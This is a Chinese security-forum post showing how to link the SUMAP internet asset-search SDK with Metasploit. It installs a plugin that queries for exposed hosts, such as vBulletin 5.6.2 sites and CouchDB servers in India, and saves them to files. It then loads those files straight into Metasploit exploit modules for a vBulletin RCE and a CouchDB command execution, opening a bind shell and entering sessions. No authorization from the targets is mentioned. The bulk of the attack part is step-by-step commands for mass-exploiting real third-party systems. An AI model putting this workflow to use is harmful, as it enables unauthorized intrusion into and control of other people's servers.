首页
论坛
课程
招聘
[原创]SUMAP联动MSF
2021-9-2 17:10 4886

[原创]SUMAP联动MSF

2021-9-2 17:10
4886

0x00 前言

前几天安恒SUMAP团队更新了新版的SDK3.0版本,附带了许多新功能以及新数据类型,BS的搜索语法可以在共用在SDK实现同一套查询语法。本次测试主要围绕sumap sdk 3.0的 MSF 联动 功能。

0x01 安装

1. 运行安装脚本

本次测试以为kali Linux为基础测试,解压sumap msf联动插件,目录有两个PY脚本文件:

1
2
├── setup.py
└── sumap_search.py

setup.py是安装sumap MSF联动插件安装脚本,sumap_search.py功能插件。setup.py接受一个参数,参数是metasploit-framework所在目录。

1
2
1. kali默认msf路径/usr/share
2. 如果msf是自定义安装,那么使用自定义安装目录

注意:kali原生的msf使用 python3 setup.py /usr/share/ 安装

1
python3 setup.py /opt    

 

界面返回:"module sumap_search installed susccessfully",插件已经安装成功。

 

setup.py会自动将功能插件复制到~/.msf4/modules/auxiliary/gather,为了确保正确安装,查看是否出现:

 

2. 设置SDK token

1
2
export SUMAPTOKEN=xxxxx
export SUMAPHOSTID=xxx

3. 测试安装是否成功

0x02 查询技巧

SUMAP MSF联动插件具体有以下3个字段:

  1. query:查询数据
  2. file:为空即屏幕输出,否则保存到文件
  3. size:设置最大拖取数据

1. 通过tags查询巴西地区Docker的Harbor资产数据

1
2
3
set query "tags:"harbor"&&country:"BR""
set file ''
set size 3

2. 通过icon图标查询巴西地区Docker的Harbor资产数据

将harbor的ico进行hash计算后的结果传入查询

1
2
3
set query "icohash:"-510172706"&&country:"BR""
set file ''
set size 3

3. 高级与或非组合语法查询巴西地区Docker的Harbor资产数据

更新后的CS端支持高级查询方式,具体语法如下:

1
2
3
4
5
可以使用 && || ! 符号,如: 
1、domain:"aaa.com"&&!domain:"bbb.com"          
2、hostname:"powered by"||!hostname:"discuz"            
3、!ip:"0.0.0.0/0"&&!port:80&&!port:90||title:"xxxx"    
4、country:"巴西"&&ipv:"6"&&!port:"80"&&http_status:200&&!port:90||title:"xxxx"     

例如,想要查询带有ico图标并且开在443端口的Harbor数据

 

1
2
3
set query "tags:"harbor"&&port:443&&icohash:"-510172706"&&country:"BR""
set file ''
set size 3

4. 一些需要避过的坑

由于MSF框架的JSON实现有bug:Encoding::UndefinedConversionError "\xE4" from ASCII-8BIT to UTF-8,所以在输入中文查询时会出现错误:

 

这个bug,我们在测试时已提交给MSF官方了。所以我们在查询国别等带有中文字符时,可以用国家缩写代替,比如“瑞典”可以替换为"SE":

0x03 联动demo测试

联动测试论坛系统vBulletin

vBulletin是一个国外非常火热的论坛系统。在2020年时vBulletin5.6.2爆出了非常严重的无条件RCE漏洞:CVE-2019-16759绕过。其widget_tabbedContainer_tab_panel组件存在模板注入,攻击者可以轻易的通过命令注入获得系统权限。

 

漏洞详细可参考 https://www.1337pwn.com/how-to-hack-vbulletin-5-6-0-5-6-2-using-zero-day-rce-exploit/

1. 通过sumap_search 批量导出数据

  • 首先去SUMAP上查询数据量

  • 设置查询语法

    1
    2
    3
    4
    set query "data:"vBulletin 5.6.2"&&!data:"UPnP/1.0""
    set file vbullentin.txt
    set size 47
    run

2. 加载vBulletin的漏洞模块

  • 加载vBulletin RCE

    1
    2
    3
    4
    5
    1. 搜索vuBulletin相关漏洞
    search vbulletin
     
    2. 选中第四个
    use 4

  • 设置漏洞模块载荷

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    1. 设置stage类型, 1. 表示Unix命令执行
        set target 1
     
    2. 设置目标主机
        set RHOSTS file:vbullentin.txt
     
    3. 设置端口,这里我们设置为443
        set RPORT 443
     
    4. 设置https交互
        set SSL true
     
    5. 设置执行的命令
            set CMD id

  • 开始测试:run

  • 查看测试成功的结果:

    由于我们选择的是命令执行,不会建立session会话,所以直接在测试界面查看结果:

数据库CouchDB漏洞测试

CouchDB是Apache基金会开源的NoSQL数据库,专注于易用性。CouchDB一般开在5984端口,在CouchDB\<2.1.0版本存在Post-Auth RCE漏洞。在未设置登录或弱口令密码情况下,可通过json进行远程代码执行。

 

漏洞详情可参考https://www.exploit-db.com/exploits/44913

1. 通过sumap_search tags高级组合搜索语法

  • 首先可以在SUMAP b/s测试搜索语句以及资产数量

  • 设置查询语法

    1
    2
    3
    set query "tags:\"couchdb\"&&!data:\"UPnP/1.0\"&&port:5984&&country:\"IN\""
    set file couchdb-in.txt
    set size 500

2. 加载couchdb漏洞模块

  • 加载apache_couchdb_cmd_exec

    1
    use exploit/linux/http/apache_couchdb_cmd_exec
  • 设置漏洞载荷

    1
    2
    3
    4
    5
    6
    7
    8
    1. 设置目标IP
        set RHOSTS file:couchdb-in.txt
     
    2. 设置目标端口
        set RPORT 5984
     
    3. 设置payload载荷
            set payload payload/generic/shell_bind_tcp
  • 开始测试:run

  • 查看结果:sessions

    执行命令:sessions -i 1进入shell

0x04 总结

本次测试sumap_sdk3.0 msf联动模块,简化用户在安全测试过程中的繁琐工作,同时对于网络空间测绘也进入到了一个新的高度和维度,实现了不同维度的资产搜索。期待后续sumap能有更新更强的功能发布。

 

sumap网址:https://sumap.dbappsecurity.com.cn/


[注意] 欢迎加入看雪团队!base上海,招聘CTF安全工程师,将兴趣和工作融合在一起!看雪20年安全圈的口碑,助你快速成长!

最后于 2021-9-2 17:14 被zizixixi编辑 ,原因:
收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回